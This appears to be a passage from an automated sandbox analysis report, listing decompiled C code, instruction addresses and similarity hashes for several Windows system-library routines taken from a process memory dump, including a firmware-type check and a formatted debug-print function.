					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E010BAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01094620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E010BAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E010F500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E010B9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                            0x010f51be
                                                                            0x010f51c3
                                                                            0x010f51c8
                                                                            0x010f51cd
                                                                            0x010f51d0
                                                                            0x010f51d3
                                                                            0x010f51d8
                                                                            0x010f51db
                                                                            0x010f51de
                                                                            0x010f51e0
                                                                            0x010f51e3
                                                                            0x010f51e6
                                                                            0x010f51e8
                                                                            0x010f5342
                                                                            0x010f5351
                                                                            0x010f5356
                                                                            0x010f535a
                                                                            0x010f5360
                                                                            0x010f5363
                                                                            0x010f5366
                                                                            0x010f5369
                                                                            0x010f5369
                                                                            0x010f536b
                                                                            0x010f536b
                                                                            0x010f5370
                                                                            0x010f53a3
                                                                            0x010f53a4
                                                                            0x010f53a6
                                                                            0x010f53ab
                                                                            0x010f53ab
                                                                            0x010f53ae
                                                                            0x010f53ae
                                                                            0x010f53b5
                                                                            0x010f53bf
                                                                            0x010f53bf
                                                                            0x010f5375
                                                                            0x010f5396
                                                                            0x010f53a0
                                                                            0x010f53a0
                                                                            0x00000000
                                                                            0x010f5396
                                                                            0x010f5377
                                                                            0x010f5379
                                                                            0x010f537f
                                                                            0x010f538c
                                                                            0x010f5390
                                                                            0x00000000
                                                                            0x010f5390
                                                                            0x010f51ee
                                                                            0x010f51f1
                                                                            0x010f5301
                                                                            0x010f5310
                                                                            0x010f5315
                                                                            0x010f5318
                                                                            0x010f531b
                                                                            0x010f5320
                                                                            0x010f532e
                                                                            0x010f5331
                                                                            0x00000000
                                                                            0x010f5331
                                                                            0x010f5328
                                                                            0x010f5329
                                                                            0x00000000
                                                                            0x010f5329
                                                                            0x010f51fa
                                                                            0x010f5235
                                                                            0x010f5236
                                                                            0x010f5239
                                                                            0x010f523f
                                                                            0x010f5240
                                                                            0x010f5241
                                                                            0x010f5242
                                                                            0x010f5246
                                                                            0x010f5247
                                                                            0x010f524e
                                                                            0x010f5251
                                                                            0x010f5267
                                                                            0x010f5269
                                                                            0x010f526e
                                                                            0x010f527d
                                                                            0x010f527e
                                                                            0x010f5281
                                                                            0x010f5282
                                                                            0x010f5287
                                                                            0x010f5288
                                                                            0x010f528a
                                                                            0x010f528f
                                                                            0x010f5294
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010f529a
                                                                            0x010f529c
                                                                            0x010f529e
                                                                            0x010f529e
                                                                            0x010f52a4
                                                                            0x010f52b0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010f52ba
                                                                            0x010f52bc
                                                                            0x010f52bc
                                                                            0x010f52d4
                                                                            0x010f52d9
                                                                            0x010f52dc
                                                                            0x010f52e1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010f52e7
                                                                            0x010f52f4
                                                                            0x00000000
                                                                            0x010f52f4
                                                                            0x010f5270
                                                                            0x00000000
                                                                            0x010f5270
                                                                            0x010f51fc
                                                                            0x010f51fd
                                                                            0x010f5202
                                                                            0x010f5203
                                                                            0x010f5205
                                                                            0x010f520a
                                                                            0x010f520f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010f521b
                                                                            0x010f5226
                                                                            0x010f522b
                                                                            0x010f521d
                                                                            0x010f521d
                                                                            0x010f5222
                                                                            0x010f5222
                                                                            0x010f522d
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: 7ba92979a222a4ce0a8e3fa57a2f9592d8e127d9d5dfc6dea3d2e670de7779b2
                                                                            • Instruction ID: a80d9201eabc8b004bae3f22c98536c6d866db90c4e3672e3c76ea36a94d44ba
                                                                            • Opcode Fuzzy Hash: 7ba92979a222a4ce0a8e3fa57a2f9592d8e127d9d5dfc6dea3d2e670de7779b2
                                                                            • Instruction Fuzzy Hash: 2A516071A006099FDB64DFA8CD81BAEBBF8FF48700F14806DE689EB651D7719900CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 76%
                                                                            			E0109B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x116d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01097D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01148CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E010B9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E010BB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E010BCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01097D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01148F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E010BAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1168628; // 0x0
								_v68 = _t77;
								_t78 =  *0x116862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1168628; // 0x0
							_t116 =  *0x116862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                            0x0109b94c
                                                                            0x0109b956
                                                                            0x0109b95c
                                                                            0x0109b95e
                                                                            0x0109b964
                                                                            0x0109b969
                                                                            0x0109b96d
                                                                            0x0109b96d
                                                                            0x0109b970
                                                                            0x0109b974
                                                                            0x0109b97a
                                                                            0x0109badf
                                                                            0x0109badf
                                                                            0x0109bae2
                                                                            0x0109bae4
                                                                            0x0109bae6
                                                                            0x0109baf0
                                                                            0x010e2cb8
                                                                            0x0109baf6
                                                                            0x0109baf6
                                                                            0x0109baf6
                                                                            0x0109bafd
                                                                            0x0109bb1f
                                                                            0x0109bb1f
                                                                            0x0109baff
                                                                            0x0109bb00
                                                                            0x0109bb00
                                                                            0x0109bb03
                                                                            0x0109bb03
                                                                            0x0109bacb
                                                                            0x0109bacf
                                                                            0x0109bad0
                                                                            0x0109bad1
                                                                            0x0109badc
                                                                            0x0109badc
                                                                            0x0109b980
                                                                            0x0109b980
                                                                            0x0109b988
                                                                            0x0109b98b
                                                                            0x0109b98d
                                                                            0x0109b990
                                                                            0x0109b993
                                                                            0x0109b999
                                                                            0x0109b99b
                                                                            0x0109b9a1
                                                                            0x0109b9a5
                                                                            0x0109b9aa
                                                                            0x0109b9b0
                                                                            0x0109b9bb
                                                                            0x0109b9c0
                                                                            0x0109b9c3
                                                                            0x0109b9ca
                                                                            0x0109b9cc
                                                                            0x0109b9cf
                                                                            0x0109b9d3
                                                                            0x0109b9d7
                                                                            0x0109ba94
                                                                            0x0109ba94
                                                                            0x0109ba98
                                                                            0x0109baa3
                                                                            0x010e2ccb
                                                                            0x0109baa9
                                                                            0x0109baa9
                                                                            0x0109baa9
                                                                            0x0109bab1
                                                                            0x010e2cd5
                                                                            0x010e2cdd
                                                                            0x010e2cdd
                                                                            0x0109babb
                                                                            0x0109babc
                                                                            0x0109bac2
                                                                            0x0109bac3
                                                                            0x0109bac3
                                                                            0x0109bac6
                                                                            0x00000000
                                                                            0x0109b9dd
                                                                            0x0109b9dd
                                                                            0x0109b9e7
                                                                            0x0109b9e7
                                                                            0x0109b9ec
                                                                            0x0109b9ec
                                                                            0x0109b9f1
                                                                            0x0109b9f5
                                                                            0x0109b9fa
                                                                            0x0109ba00
                                                                            0x0109ba0c
                                                                            0x0109ba10
                                                                            0x0109ba10
                                                                            0x0109ba12
                                                                            0x0109ba18
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109bb26
                                                                            0x0109bb26
                                                                            0x0109ba1e
                                                                            0x0109ba1e
                                                                            0x0109ba23
                                                                            0x0109ba25
                                                                            0x0109ba2c
                                                                            0x0109ba30
                                                                            0x0109ba35
                                                                            0x0109ba35
                                                                            0x0109ba41
                                                                            0x0109ba46
                                                                            0x0109ba4c
                                                                            0x0109ba50
                                                                            0x0109ba54
                                                                            0x0109ba6a
                                                                            0x0109ba6e
                                                                            0x0109ba70
                                                                            0x0109ba74
                                                                            0x0109ba78
                                                                            0x0109ba7a
                                                                            0x0109ba7c
                                                                            0x0109ba8e
                                                                            0x0109ba90
                                                                            0x0109ba92
                                                                            0x0109bb14
                                                                            0x0109bb14
                                                                            0x0109bb16
                                                                            0x0109bb16
                                                                            0x00000000
                                                                            0x0109ba7c
                                                                            0x0109bb0a
                                                                            0x0109bb0d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109bb0f

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109B9A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 885266447-0
                                                                            • Opcode ID: e9d5aae6446c0b2e68a154bdce783c603c92322001f4c0b8788e9320f9f2a4d5
                                                                            • Instruction ID: 9179bb82f858ae31d3aa179d6a407943956b27141fe29fdd5005d42506247760
                                                                            • Opcode Fuzzy Hash: e9d5aae6446c0b2e68a154bdce783c603c92322001f4c0b8788e9320f9f2a4d5
                                                                            • Instruction Fuzzy Hash: 33516871A08301CFCB24DF6DD0A092ABBE5FB88620F1489AEF6D587355D771E840DB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0107B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E0107B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x114f7a8);
				E010CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E010CD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E010BD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E010BF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L010CDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E010BB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E010BB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E010BE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E010BA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                            0x0107b171
                                                                            0x0107b171
                                                                            0x0107b171
                                                                            0x0107b171
                                                                            0x0107b171
                                                                            0x0107b176
                                                                            0x0107b17b
                                                                            0x0107b180
                                                                            0x0107b186
                                                                            0x0107b18f
                                                                            0x0107b198
                                                                            0x0107b1a4
                                                                            0x0107b1aa
                                                                            0x010d4802
                                                                            0x010d4802
                                                                            0x010d4805
                                                                            0x010d480c
                                                                            0x010d480e
                                                                            0x0107b1d1
                                                                            0x0107b1d3
                                                                            0x0107b1de
                                                                            0x0107b1de
                                                                            0x010d4817
                                                                            0x010d481e
                                                                            0x010d4820
                                                                            0x010d4822
                                                                            0x010d4822
                                                                            0x010d4824
                                                                            0x010d4824
                                                                            0x010d482a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4835
                                                                            0x010d483a
                                                                            0x010d483d
                                                                            0x010d483f
                                                                            0x010d4842
                                                                            0x010d4842
                                                                            0x010d4842
                                                                            0x010d4846
                                                                            0x010d484c
                                                                            0x010d484e
                                                                            0x010d4851
                                                                            0x010d4851
                                                                            0x010d4853
                                                                            0x010d4854
                                                                            0x010d4854
                                                                            0x010d4858
                                                                            0x010d485a
                                                                            0x010d485a
                                                                            0x010d485d
                                                                            0x010d485f
                                                                            0x010d4861
                                                                            0x010d4861
                                                                            0x010d4866
                                                                            0x010d486b
                                                                            0x010d486e
                                                                            0x010d4871
                                                                            0x010d4876
                                                                            0x010d4876
                                                                            0x010d4878
                                                                            0x010d487b
                                                                            0x010d4884
                                                                            0x010d4884
                                                                            0x00000000
                                                                            0x010d487d
                                                                            0x010d487d
                                                                            0x010d4882
                                                                            0x010d4889
                                                                            0x010d4889
                                                                            0x010d488f
                                                                            0x010d4891
                                                                            0x010d48e0
                                                                            0x010d48e2
                                                                            0x010d48e4
                                                                            0x010d48e4
                                                                            0x010d48e7
                                                                            0x010d48e7
                                                                            0x010d48ed
                                                                            0x010d48f4
                                                                            0x010d48f6
                                                                            0x010d4951
                                                                            0x010d4951
                                                                            0x010d4953
                                                                            0x010d4953
                                                                            0x010d4956
                                                                            0x010d4956
                                                                            0x010d4958
                                                                            0x010d4959
                                                                            0x010d4959
                                                                            0x010d495d
                                                                            0x010d495d
                                                                            0x010d495f
                                                                            0x010d495f
                                                                            0x010d4965
                                                                            0x010d4969
                                                                            0x010d49ba
                                                                            0x010d49ba
                                                                            0x010d49c1
                                                                            0x010d49c5
                                                                            0x010d49cc
                                                                            0x010d49d4
                                                                            0x010d49d7
                                                                            0x010d49da
                                                                            0x010d49e4
                                                                            0x010d49e5
                                                                            0x010d49f3
                                                                            0x010d4a02
                                                                            0x00000000
                                                                            0x010d4a02
                                                                            0x010d4972
                                                                            0x010d4974
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4976
                                                                            0x010d4979
                                                                            0x010d4982
                                                                            0x010d4983
                                                                            0x010d4984
                                                                            0x010d498b
                                                                            0x010d498d
                                                                            0x010d4991
                                                                            0x010d4993
                                                                            0x010d4999
                                                                            0x010d499d
                                                                            0x010d49a2
                                                                            0x010d49a2
                                                                            0x010d49a2
                                                                            0x010d4999
                                                                            0x010d49ac
                                                                            0x00000000
                                                                            0x010d49b3
                                                                            0x010d48f8
                                                                            0x010d48fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48fe
                                                                            0x010d4895
                                                                            0x010d489c
                                                                            0x010d48ad
                                                                            0x010d48b2
                                                                            0x010d48b5
                                                                            0x010d48b7
                                                                            0x010d48ba
                                                                            0x010d48bc
                                                                            0x010d48c6
                                                                            0x010d48c6
                                                                            0x010d48cb
                                                                            0x010d48d1
                                                                            0x010d48d4
                                                                            0x010d48d8
                                                                            0x010d48d8
                                                                            0x00000000
                                                                            0x010d48d8
                                                                            0x010d48be
                                                                            0x010d48c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48c2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48c4
                                                                            0x00000000
                                                                            0x010d4882
                                                                            0x010d487b
                                                                            0x010d4904
                                                                            0x010d4906
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4908
                                                                            0x010d490e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4910
                                                                            0x010d4917
                                                                            0x010d4917
                                                                            0x00000000
                                                                            0x010d4917
                                                                            0x0107b1ba
                                                                            0x010d47f9
                                                                            0x010d47fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d47fc
                                                                            0x0107b1c0
                                                                            0x0107b1c0
                                                                            0x0107b1c3
                                                                            0x0107b1cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _vswprintf_s
                                                                            • String ID:
                                                                            • API String ID: 677850445-0
                                                                            • Opcode ID: 367230264c3a824e1df4b87f0d80adb3a58f6e84d03397d42955f2a990fe7146
                                                                            • Instruction ID: a0e417247003bbfb3778049f734cde2843a2f0cab2b88eb38d57b72046988c9c
                                                                            • Opcode Fuzzy Hash: 367230264c3a824e1df4b87f0d80adb3a58f6e84d03397d42955f2a990fe7146
                                                                            • Instruction Fuzzy Hash: 6451BF71D003598EDB25CF68C885BAEBBF0AF04750F1441A9E899EBA82D7714945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010A2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 82%
                                                                            			E010A2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200326, char _a1546912006) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed char _t241;
				signed char _t245;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				signed int _t258;
				signed int _t265;
				signed int _t268;
				signed int _t276;
				intOrPtr _t282;
				signed int _t284;
				signed int _t286;
				void* _t287;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				signed int* _t296;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				void* _t332;
				signed int _t333;
				signed int _t335;
				signed int _t338;
				void* _t339;
				void* _t341;

				_t335 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x116d360 ^ _t335;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x116b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t282 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t322 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t282 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
